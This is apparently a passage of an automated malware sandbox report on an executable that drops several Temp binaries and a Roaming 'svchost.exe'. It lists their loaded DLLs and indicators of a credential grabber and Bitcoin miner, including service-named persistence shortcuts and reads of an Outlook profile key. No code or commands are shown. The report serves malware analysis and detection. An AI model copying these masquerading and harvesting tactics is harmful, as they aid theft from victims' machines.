Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Section loaded: userenv.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: version.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: wldp.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: profapi.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: rasman.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: dwrite.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: secur32.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: schannel.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: mskeyprotect.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: ntasn1.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: ncrypt.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: ncryptsslp.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\KMSAuto\accc.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: wininet.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Service_Adobe.exe.lnk.0.dr	LNK file: ..\..\..\..\..\Adobe\Service_Adobe.exe
Source: Service_com.adobe.dunamis.exe.lnk.0.dr	LNK file: ..\..\..\..\..\com.adobe.dunamis\Service_com.adobe.dunamis.exe
Source: Service_Microsoft.exe.lnk.0.dr	LNK file: ..\..\..\..\Service_Microsoft.exe
Source: Service_Mozilla.exe.lnk.0.dr	LNK file: ..\..\..\..\..\Mozilla\Service_Mozilla.exe
Source: Service_Skype.exe.lnk.0.dr	LNK file: ..\..\..\..\..\Skype\Service_Skype.exe
Source: psvhost.exe.lnk.0.dr	LNK file: ..\..\..\..\..\..\Local\Microsoft\psvhost.exe

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

File written: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\svchost.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: xj40xovMsm.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: xj40xovMsm.exe

Static file information: File size 15088640 > 1048576

Source: xj40xovMsm.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: ntkrnlmp.pdb3x, source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: costura.dotnetzip.pdb.compressed source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002819000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdbr source: xj40xovMsm.exe
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.6.dr, Temp.txt.9.dr
Source:	Binary string: C:\Users\Netboy FX\Desktop\BitcoinMiner\BitcoinMiner\obj\Release\BitcoinMiner.pdb source: xj40xovMsm.exe
Source:	Binary string: costura.dotnetzip.pdb.compressed\|\|\|DotNetZip.pdb\|565BABCBCD978AF66FE1150CC58FDEAFC9815822\|622080 source: explorer.exe, 00000002.00000003.1848102224.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000000.1848901548.0000000000EE2000.00000002.00000001.01000000.0000000C.sdmp, 3CBD.tmp.Installer.exe.2.dr, accc.exe.5.dr
Source:	Binary string: costura.dotnetzip.pdb.compressed`E source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbtmpDx source: 62AB.tmp.build.exe, 00000014.00000002.2313201654.00000000012B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: p.pdb.compressed source: accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed8 source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000020.00000002.2548612553.0000000002823000.00000004.00000800.00020000.00000000.sdmp

Source: xj40xovMsm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: xj40xovMsm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: xj40xovMsm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: xj40xovMsm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
